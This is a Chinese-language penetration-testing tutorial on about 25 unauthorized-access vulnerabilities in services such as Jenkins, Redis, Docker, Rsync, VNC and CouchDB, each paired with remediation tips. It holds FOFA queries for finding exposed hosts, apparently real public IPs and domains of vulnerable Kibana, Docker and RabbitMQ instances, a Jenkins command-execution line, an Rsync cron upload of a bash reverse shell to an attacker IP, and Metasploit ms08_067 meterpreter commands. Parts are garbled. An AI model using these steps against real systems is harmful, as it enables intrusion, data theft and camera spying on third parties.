未授权访问漏洞

1.jenkins未授权访问漏洞

步骤一：使用以下fofa语法进行搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二：进入执行页面http://xxx.xxx.xxx.xxx:xxxx/manage/script/index.php

执行代码

println "whoami" .execute().text

漏洞修复：1.升级版本。2.添加认证。3.禁止将jenkins暴露在公网。

2.Jupyter NoteBook未授权访问漏洞

步骤一：fofa搜索语句

"Jupyter Notebook" && port="8888"

步骤二：可直接进入

添加一个新的终端

漏洞修复：1.开启身份验证，防止未经授权用户访问。2.限制IP访问。

3.redis未授权漏洞

步骤一：使用kali扫描

kali安装redis-cli远程连接工具
 
wget http://download.redis.io/redis-stable.tar.gz
 
tar -zxvf redis-stable.tar.gz
 
cd redis-stable
 
make
 
cp src/redis-cli /usr/bin/
 
redis-cli -h
 
使用redis-cli命令直接远程免密登录redis主机
 
redis-cli -h 目标主机IP

漏洞修复：1.禁止使用root权限启动redis服务。2.添加IP访问限制，并更改默认6379端口。

4.mongodb未授权漏洞

步骤一：直接连接

漏洞修复：1.设置防火墙策略，限定 IP 访问服务。2.在admin.system.users中添加用户，启动认证。3.禁用HTTP和REST端口，修改配置文件或在启动的时候选择参数nohttpinterface=false。

5.memcached未授权漏洞

无需用户名密码，可以直接连接memcache 服务的11211端口

telnet 10.10.4.89 11211

# 或者

nc -vv 11211

使用了 stats 命令来输出 Memcached 服务信息。

漏洞修复：1.修改绑定的IP、端口和指定访问者IP。2.设置防火墙策略。3.禁止暴露在公网。4.配置memcached监听本地回环地址。

6.zookeeper未授权漏洞

stat：列出关于性能和连接的客户端的统计信息。

echo stat | ncat 127.0.0.1 2181

ruok：测试服务器是否运行在非错误状态。

echo ruok | ncat 127.0.0.1 2181

dump：列出未完成的会话和临时节点。

echo dump | ncat 127.0.0.1 2181

漏洞修复：1.为ZooKeeper配置相应的访问权限。

                2.禁止把Zookeeper直接暴露在公网。

7.Elasticsearch未授权访问漏洞

信息收集

fofa进行搜索

搜索语法:"Elasticsearch" && port="9200"

#目标地址
http://121.37.170.50:9200/#访问测试

http://localhost:9200/_plugin/head/web管理界面

http://localhost:9200/_cat/indices

http://localhost:9200/_river/_search 查看数据库敏感信息

http://localhost:9200/_nodes查看节点数据

》》》漏洞修复《《《
1.访问控制策略，限制IP访问，绑定固定IP。
2.在 config/elasticsearch.yml 中为9200端口设置认证等

8.Kibana未授权访问漏洞

        Kibana是一个开源的分析与可视化平台，设计出来用于和Elasticsearch一起使用的。你可以用kibana搜索、查看存放在Elasticsearch中的数据。Kibana与Elasticsearch的交互方式是以各种不同的图表、表格、地图等直观地展示数据，从而达到高级的数据分析与可视化的目的。

》》》漏洞复现《《《
步骤一:使用以下Fofa语句搜索Kibana产品.并打开页面..

"kibana" && port="5601"

步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面

#拼接路径HTTP://{IP}/app/kibana#/#eg
http://47.107.232.239:5601/
http://112.124.54.84:5601/
http://54.165.173.231:5601/
http://120.26.8.236:5601/

     》》》漏洞修复《《《
1.升级Kibana到最新版本,升级地址如下https://www.elastic.co/cn/downloads/kibana。

2.在kibana所在的服务器上安装nginx服务，利用nginx的转发指令实现，需要输入账号密码才可以访问页面。

3.如果正常业务中 kibana 服务需要被其他服务器来访问，可以通过 iptables 策略，仅允许指定的IP来访问服务。

9.Docker Remote API未授权访问漏洞

        Docker是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的LINUX机器上，也可以实现虚拟化。
        Docker swarm 是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker AP!，能够方便docker集群的管理和扩展，由docker官方提供.

》》》漏洞信息《《《
Docker Remote API如配置不当可导致未授权访问，被攻击者恶意利用。攻击者无需认证即可访问到Docker数据，可能导致敏感信息泄露，黑客也可以删除Docker上的数据,直接访问宿主机上的敏感信息，或对敏感文件进行修改，最终完全控制服务器。
》》》漏洞复现《《《
步骤一:使用以下Fofa语句对Docker产品进行搜索.

port="2375"

步骤二:直接使用浏览器访问以下路径..

http://ip:2375/version  #查看版本信息
http://ip:2375/info#eg  #查看容器信息
http://51.77.151.198:2375/

步骤三:使用-H参数连接目标主机的docker，使用ps命令查询目标系统运行的镜像。

docker -H tcp://51.77.151.198:2375 pS
docker -H tcp://51.77.151.198:2375 version
docker -H tcp://51.77.151.198:2375 exec -it 1f4 /bin/bash
操作思路:
    docker pull 下载有Docker逃逸的容器下来
    docker逃逸间接获取安装docker主机控制权限

》》》漏洞修复《《《
1.端口访问控制
        对2375端口做网络访问控制，如设置iptables策略仅允许指定的IP来访问Docker接口。
2.使用TLS认证
        修改docker swarm的认证方式，使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档，说的是配置好TLS后，DockerCLl在发送命令到docker daemon之前，会首先发送它的证书，如果证书是由daemon信任的CA所签名的，才可以继续执行。

10.Kubernetes Api Server未授权访问漏洞

        Kubernetes 的服务在正常启动后会开启两个端口:Localhost Port(默认8080)Secure Port (默认6443)。这两个端口都是提供 Api Server 服务的，一个可以直接通过Web 访问，另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限，那么攻击者就可以通过这两个接口去获取容器的权限。

》》》漏洞复现《《《
步骤一:使用以下Fofa语法搜索Kubernetes产品..

port="8080" && app="Kubernetes"

步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API列表

http://ip:8080/ui     //dashboard页面，可创建/修改/删除容器查看日志等...

》》》漏洞修复《《《
        1.进行授权认证
        2.使用Service Account令牌
        3.置防火墙策略

11.Hadoop未授权访问漏洞

        Hadoop是一个由Apache基金会所开发的分布式系统基础架构，由于服务器直接在开放了Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口，黑客可以通过命令行操作多个目录下的数据，如进行删除，下载，目录浏览甚至命令执行等操作，产生极大的危害。

》》》漏洞复现《《《

步骤一:使用以下FOFA语法进行Hadoop产品的搜索...

port="8088" && app="Hadoop"

步骤二:开启页面直接访问不经过用户密码验证…

ip/cluster

》》》漏洞修复《《《
        1.如无必要，关闭网站管理页面。
        2.开启身份验证，防止未经授权用户访问。
        3.设置"安全组"访问控制策略，将Had oop默认开放的多个端口对公网全部禁止或限制可信任的IP 地址才能访问包括50070 以及WebUl等相关端口。

12.ActiveMQ未授权访问漏洞

ActiveMQ是一款流行的开源消息服务器。默认情况下，ActiveMQ服务是没有配置安全参恶意人员可以利用默认配置弱点发动远程命令执行攻击，获取服务器权限，从而导致数据泄路。

漏洞复现《《《
        步骤一:使用以下Fofa语法搜索产品…

body="ActiveMQ" && port="8161"

步骤二:ActiveMQ默认使用8161端口，默认用户名和密码是 admin/admin ，在打开的页面输入....

》》》漏洞修复《《《
        1.ActiveMQ的安全配置分为控制台安全配置和后台安全配置。控制台安全配置是指用户通过浏览器登录ActiveMQ管理界面，对ActiveMQ进行管理的一个安全配置;主要是添加用户和密码。后台安全配置是指程序通过ActiveMQ发送消息的一个安全配置。
        2.ActiveMQ后台安全配置。配置置连接ActiveMQ的用户名和密码，如果不设置ActiveMQ安全机制任何知道ActiveMQ服务的IP、端口和消息地址的人，都可以接受和发送消息。

13.RabbitMQ未授权访问漏洞

        RabbitMQ是目前非常热门的一款消息中间件，基于AMQP协议的，可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON，简单字符串或可以转换为JSON字符串的值列表.

》》》漏洞复现《《《

步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索..

port="15672"
port="15692"
port="25672"

步骤二:在打开的页面中可输入默认的账号和密码进行登陆

默认账号密码都是guest
http://x.x.x.x:15672
http://x.x.x.x:25672http://x.x.x.x:15692
#eg
http://bzgx.yuyiying.com:15672/

》》》漏洞修复《《《
        1.修改为强密码，删除默认的账号guest。
        2.禁止对外网开放，仅限于内部访问。

14.Springboot Actuator未授权访问漏洞

        Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块，借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下，如果没有做好相关权限控制，非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息，从而导致信息泄露甚至服务器被接管的事件发生。

》》》Actuator《《《
        Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点，原生端点主要有:

/dump - 显示线程转储(包括堆栈跟踪)
/autoconfig -显示自动配置报告
/configprops-显示配置属性
/trace -显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown -关闭应用程序
/info - 显示应用信息
/metrics - 显示当前应用的'指标"信息
/health -显示应用程序的健康指标
/beans-显示Spring Beans的完整列表
/mappings-显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart-重新启动应用程序

》》》漏洞复现《《《
步骤一:使用以下Fofa语句搜索资产并打开页面访问，

#Fofa语法
icon_hash="116323821"
#eg
http://2.sureyong.com:9999/#/

步骤二:当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了
springboot 框架...

步骤三:拼接以下路径查看泄露的数据..

    访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等)，如果存在登录用户的操作请求，可以伪造cookie进行登录。
    访问/env端点获取全部环境属性，由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务，所以通过监控信息有时可以mysql、mangodb 数据库信息，如果数据库正好开放在公网，那么造成的危害是巨大的。
    git项目地址泄露，这个一般是在/health 路径，比如如下站点，访问其 health 路径可探测到站点 git 项目地址。    

》》》漏洞修复《《《
1.禁用/env接口。
2.升级到Springboot actuator 2.0。
3.禁止对外开放。

15.FTP未授权访问漏洞(匿名登陆)

        FTP 弱口令或匿名登录漏洞，一般指使用 FTP 的用户启用了匿名登录功能，或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等，容易被黑客攻击，发生恶意文件上传或更严重的入侵行为。

》》》漏洞复现《《《《
        步骤一:对目标环境在资源管理器中用以下格式访问...如果该服务器开启了匿名登陆，则可直接进行内容查看..

漏洞修复《《
1.禁止匿名登录

16.JBoss未授权访问漏洞大

        JBoss是一个基于J2EE的开放源代码应用服务器，代码遵循LGPL许可，可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器，支持EJB1.1、EJB 2.0和EJB3规范。,默认情况下访问 http://ip:8080/imx-console 就可以浏览 JBoss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。

>>>漏洞复现<<<

步骤一:使用以下语法搜索Jboss产品并打开其页面.

title="Welcome to JBoss"

步骤二:拼接以下路径且无需认证直接进入控制页面..

#拼接路径
http://ip:port/jmx-console/#eg
http://ip:port/jmx-console/

步骤三:后续可以利用 jboss.deployment 部署shel
》》》漏洞修复《《《
1.jboss.deployment部署shell
2.进行JMX Console 安全配置。

17.Ldap未授权访问漏洞\

        LDAP中文全称为:轻型目录访问协议(Lightweight DirectoryAccess Protocol)，默认使用389， LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库，是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证，导致未授权访问。

》》》漏洞复现《《《
步骤一:使用以下Fofa语法搜索使用Idap服务的产品.….并通过Ldapadmin可视化工具做连接验证

#Fofa语法
port="389" #Ldapadmin工具
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/     #用这个下载

步骤二:启动工具并测试存在未授权的LDAP服务..成功如下

步骤三:连接目标LDAP服务并查看其内容

》》》漏洞修复《《《
1.修改ldap的acl，不允许匿名访问。
2.根据业务设置ldap访问白名单或黑名单。

18、Rsync未授权访问漏洞

Rsync 是Linux/Unix下的一个远程数据同步工具，可通过LAN/WAN快速同步多台主机间的文件和目录，默认运行在873端口。由于配置不当，导致任何人可未授权访问rsync，上传本地文件，下载服务器文件。Rsync 默认允许匿名访问，如果在配置文件中没有相关的用户认证以及文件授权，就会触发隐患。Rsync 的默认端口为837且默认配置文件路径在/etc/rsync.conf

 # 配置文件
 motd file -> motd文件位置
 log file -> 日志文件位置文件位置
 path -> 默认路径位置路径位置
 use chroot ->是否限定在该目录下定在该目录下该目录下,如果为true就限定为模块默认目录read only-> 只读配置
 list=true -> 是否可以列出模块名以列出模块名出模块名
 uid =root ->传输使用的用户名
 gid =root->传输使用的用户组
 auth users ->认证用户名secrets file=/etc/rsyncd.passwd ->指定密码文件密码文件,密码文件/etc/rsyncd.passwd的内容格式为:username:passwordhosts allow=192.168.0.101->设置可以允许访问的主机hosts deny 禁止的主机*表任意任意
 ​
 # 基本命令
 Rsync -avrlptgoDl I-e sshl Juser@hostIP:/dirl [/local/path]
 观察模式，输出更多资讯-V
 -9与-v 相反，仅显示错误信息
 递归复制，针对目录
 仅更新较新的文件-U
 复制连接的属性
 -p 复制时保持属性不变
 保存原有群组0
 保存原有拥有人0
 保存原有装置属性
 保存原有时间属性-七
 忽略更新时间属性，档案比对较快-工
 加上压缩参数2
 -e 使用协议通道，例如ssh，-essh
 -a相对于-rlptgoD，所以-a最常用

漏洞描述

Rsync未授权访问带来的危害主要有两个: 1.造成了严重的信息泄露; 2.上传脚本后门文件，远程命令执行;

漏洞复现

步骤一:在 fofa 中搜索该资产语法如下或者在Vulhub中开启靶场!!!

 # Fofa语法
 (port="873")&&(is honeypot=false && is fraud=false)
 # 启动靶场
 cd vulhub/rsync/common
 docker-compose up-d

靶场IP：192.168.30.139

本机IP：192.168.3.189

步骤二:可使用Nmap扫描该端口是否开启服务，还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测..

 # nmap命令
 nmap -p 873 --script rsync-list-modules ipaddress
 ​
 # Metasploit模块
 auxiliary/scanner/rsync/modules_list

步骤三:使用命令进行连接并读取文件.

 # 执行命令
 rsync rsync://192.168.124.153:873/
 rsync rsync://192.168.124.153:873/src/

步骤四:对系统中的敏感文件下载操作./etc/passwd

 # 执行命令
 命令格式:rsync rsync://IP:port/src/etc/passwd   #目标路径
 例如:
 rsync rsync://192.168.30.139/src/etc/passwd /home/kali/Desktop    #把passwd的文件内容复制到桌面

步骤五:上传文件..如果有相应的jsp/asp/php环境可以写一句话以phpinfo为例...

 #攻击机操作
 echo "">phpinfo.php
 cat ./phpinfo.php
 rsync ./phpinfo.php rsync://192.168.124.153:873/src/home/
 ​
 #靶机
 docker ps -a   #查看容器名
 docker exec -it common_rsync_1 /bin/bash  #在容器common_rsync_1中开启一个交互模式的终端
 root@f16687e9069f:/# cd home
 root@f16687e9069f:/home# ls
 phpinfo.php
 root@f16687e9069f:/home# cat phpinfo.php
 <?php phpinfo(); ?>

步骤六:反弹shell。在此可利用定时任务cron来反弹获取shell。

  1.查看定时任务
 rsync rsync://192.168.124.153:873/src/etc/crontab

 #2.将定时任务文件下载下来
 rsync rsync://192.168.30.139/src/etc/crontab /home/kali/Desktop 

本机IP：192.168.3.189

 4.创建shell文件
 echo "/bin/bash -i >& /dev/tcp/192.168.30.129/4444 0>&1" >shell.php
 /bin/bash -i >& /dev/tcp/47.xxx.xxx.72/2333 0>&1 
 5.授权Shell文件
 chmod 777 shell.php
 6.上传shell至靶机
 rsync -av /home/kali/Desktop/shell.php  rsync://192.168.30.139:873/src/etc/cron.hourly
 ​
 7.攻击机开启nc监听相应端口
 nc -lvp 4444

在本机开启监听

最后监听成功

漏洞修复

 # 通用解决
 配置认证用户名或者密码
 host allow/deny 来控制接入源IP
 uid和gid,使用足够但最小权限的账号进行
 必要时候可以配置只读
 非必要应该仅限制配置路径下可访问
 ​
 # 解决细节
 1.修改指定端口
 0-配置文件不存在修改指定端口的选项，可以在启动命令行通过参数指定
 /usr/local/rsync/bin.rsync --port=878 --daemon
 - 查看进程检测是否更改端口
 ps -ef | grep rsync
 2.禁止匿名访问
 -配置文件/etc/rsync.conf中增加 auth users =test
 -若未包含auth users即为匿名访问

19、VNC未授权访问漏洞

[!NOTE]

VNC 是虚拟网络控制台 Virtual Network Console 的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。VNC 默认端口号为 5900、5901.VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制target主机。

漏洞复现

步骤一:使用以下语句在Fofa上进行资产收集

 (port="5900")&&(is_honeypot=false && is_fraud=false)

步骤二:可通过MSF中的模块进行检测与漏洞利用..

 # VNC未授权检测
 msfconsole
 msf6 >use auxiliary/scanner/vnc/vnc_none_auth
 msf6 auxiliary(scanner/vnc/vnc_none_auth)>show options
 msf6 auxiliary(scanner/vnc/vnc_none _auth)>set rhosts 192.168.168.200-254
 msf6 auxiliary(scanner/vnc/vnc none auth)>set threads 100
 msf6 auxiliary(scanner/vnc/vnc none auth)>run
 ​
 ​

说明有未访问授权漏洞

 # VNC密码爆破
 msf6>use auxiliary/scanner/vnc/vnc_login
 msf6 auxiliary(scanner/vnc/vnc login)>192.168.168.228
 msf6 auxiliary(scanner/vnc/vnclogin)>set rhosts 192.168.168.228
 msf6 auxiliary(scanner/vnc/vnc login)>set blank_passwords true //弱密码爆破
 msf6 auxiliary(scanner/vnc/vnc_login)>run
 ​
 # 加载攻击模块
 msf6 exploit(windows/smb/ms08 067_netapi)>use exploit/windows/smb/ms08_067_netapi
 msf6 exploit(windows/smb/ms08_067_netapi)> set payload windows/meterpreter/reverse_tcp
 msf6 exploit(windows/smb/ms08067_netapi)>set rhosts 192.168.168.228
 msf6 exploit(windows/smb/ms08 067 netapi)>set lhost 192.168.168.102
 msf6 exploit(windows/smb/ms08 067 netapi)>set target 34
 msf6 exploit(windows/smb/ms08 067 netapi)>exploit
 获取会话后，直接run vnc可控制远程虚拟机
 ​
 # 直接控制远程机器
 msf6>use exploit/multi/handler
 msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp
 msf6 exploit(multi/handler)>set lhost 192.168.168.102
 msf6 exploit(multi/handler)>set lport 4466
 msf6 exploit(multi/handler)>exploit
 基本爆破不了

步骤三:VNC链接验证

 vncviewer ipaddress

20:Dubbo未授权访问漏洞

[!NOTE]

Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架，使得应用可通过高性能的 RPC实现服务的输 出和输入功能，可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。

漏洞复现

步骤一:使用以下语句在Fofa上进行资产收集

 (app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤二:使用TeInet程序直接进行链接测试.…

 telent IP port

防御手段

1. 配置dubbo认证

2. 设置防火墙策略;

3. 如果正常业务中dubbo 服务需要被其他服务器来访问，可以通过 iptables 策略，仅允许指定的 IP 来访问服务。

21、NSF共享目录未授权访问

Network File System(NFS)，是由SUN公司研制的UNIX表示层协议(pressentation layerprotocol)，能使使用者访问网络上别处的文件就像在使用自己的计算机一样。服务器在启用nfs服务以后，由于nfs服务未限制对外访问，导致共享目录泄漏。

漏洞复现

步骤一:使用以下语句在Fofa上进行资产收集.

 "nfs"

步骤二:执行命令进行漏洞复现...

 #安装nfs客户端
 apt install nfs-common
 #查看nfs服务器上的共享目录
 showmount -e 192.168.126.130
 #挂载相应共享目录到本地
 mount -t nfs 192.168.126.130:/grdata /mnt
 #卸载目录
 umount /mnt

漏洞修复

1. 利用iptables限制端口2049和20048端口的访问，禁止外部访问;

2. 设置/etc/exports，对访问进行控制;

22、Druid未授权访问漏洞

当开发者配置不当时就可能造成未授权访问下面给出常见Druid未授权访问路径

漏洞特征:XXXX

 /druid/websession.html
 /system/druid/websession.html
 /webpage/system/druid/websession.html(jeecg)

漏洞复现

步骤一:使用以下语句在Fofa与Google上进行资产收集..

 #Fofa
 title="Druid Stat Index"
 ​
 #PHPINFO页面
 inurl:phpinfo.php intitle:phpinfo()
 info.php test.php
 ​
 # Druid未授权访问
 inurl:"druid/index.html" intitle:"Druid Stat Index"

步骤二:对访问到的站点查看.

漏洞修复

 1.配置访问账号密码。
 2.禁止对外网开放访问。

23:CouchDB未授权访问

[!NOTE]

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台(web和应用程序)。 在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露，CVE-2017-12636是一个任意命令执行漏洞，我们可以通过config api修改couchdb的配置query_server，这个配置项在设计、执行view的时候将被运行。默认端口是6984

影响版本:小于 1.7.0 以及 小于 2.1.1

漏洞复现

步骤一:使用以下语句在Fofa上进行资产收集…..或开启Vulhub靶场进行操作...

 # 搜索语法
 (port="5984")&&(is_honeypot=false && is_fraud=false)
 ​
 # Vulhub靶场
 cd /vulhub/couchdb/CVE-2017-12636
 ​
 docker-compose up -d

步骤二:执行未授权访问测试命令

 curl IP:5984
 curl 192.168.1.4:5984/_config

漏洞修复

1. 指定CouchDB绑定的IP(需要重启CouchDB才能生效)在/etc/couchdb/local.ini 文件中找到“bind address=0.0.0.0”，把 0.0.0.0修改为 127.0.0.1 ，然后保存。 注:修改后只有本机才能访问CouchDB。

2. 设置访问密码(需要重启CouchDB才能生效)在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。

3. 设置WWW-Authenticate，强制认证。

24、Altassian Crowd 未授权访问漏洞

[!NOTE]

Atlassian Crowd和Atlassian Crowd Data Center都是澳大利亚Atlassian公司的产品Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。AtlassianCrowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件，使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd DataCenter安装任意的恶意插件，执行任意代码/命令，从而获得服务器权限。其端口:8095

影响版本

• 2.1.0<= version< 3.0.5

• 3.1.0 <= version < 3.1.6

• 3.2.0<= version<3.2.8

• 3.3.0 <= version < 3.3.5

• 3.4.0 <= version < 3.4.4

环境搭建

靶机IP:192.168.30.129

步骤一:准备一台Ubuntu虚拟机并执行以下命令下载搭建 Atlassian-crowd-3.4.3 .

 #下载crowd3.4.3的版本，进行测试。
 wget https://product-downloads.atlassian.com/software/crowd/downloads/atlassian-crowd-3.4.3.zip

步骤二:搭建Java环境并查看JDK版本..

 # 搭建Java环境
 sudo apt-get install openjdk-8-jdk
 ​
 #查看JDK版本
 java -vesion

步骤三:解压缩文件并移动到指定位置.

 # 解压缩文件
 unzip atlassian-crowd-3.4.3.zip
 ​
 #移动文件atlassian-crowd-3.4.3到/var目录下
 sudo  cp -r atlassian-crowd-3.4.3 /var/
 到该目录下
 cd /var/atlassian-crowd-3.4.3/crowd-webapp/WEB-INF/classes 

步骤四:修改配置文件并添加信息

 #配置文件
 sudo vi crowd-init.properties
 #添加信息
 crowd.home=/var/atlassian-crowd-3.4.3
 # 开启服务
 sudo sh start_crowd.sh 
 #访问页面
 http://192.168.30.129:8095/

步骤五:点击Set up Crowd需要申请key，复制Server ID;----->进入以下官网并点击New TrialLicense申请key

 server ID:
 BECL-VG6I-0HSN-DQJE
 官网地址
 https://my.atlassian.com/products/index

搭环境太复杂了最后没弄出

 # Fofa
 title="Atlassian Crowd - Login"
 icon_hash="-1231308448"

弄不好环境漏洞攻击如下

漏洞修复

• 设置访问/crowd/admin/uploadplugin.action的源ip

• 升级最新版本(3.5.0以上)

25、RTSP未授权访问漏洞

[!NOTE]

RTSP(Real Time Streaming Protocol)，实时流传输协议，是TCP/IP协议体系中的一个应用层协议，该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据，被广泛用于视频直播领域,为方便用户远程监控摄像头内容，许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。攻击者可通过VLC等视频播放软件打开rtsp地址进行摄像头画面的实时查看。

 VLC media player，单击“媒体"选项，选择“打开网络串流”
 在弹出的窗口中输入网络URL:
 rtsp://admin:888888@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1
 username:用户名。例如admin。
 password:密码。例如admin。
 ip:为设备IP。例如 192.168.1.1。
 port:端口号默认为554，若为默认可不填写
 channel:通道号，起始为1。例如通道2，则为channel=2。subtype:码流类型，主码流为0(即subtype=0)，辅码流为1(即subtype=1)

漏洞复现

步骤一:使用以下语句在Fofa上进行资产收集.

 (port="554")&&(is_honeypot=false && is_fraud=false)&& protocol="rtsp"

VLC media player下载地址

 https://www.videolan.org/vlc/

通过这个工具测试漏洞

步骤二：打开VLC软件网络---->打开网络串流

成功可实时查看。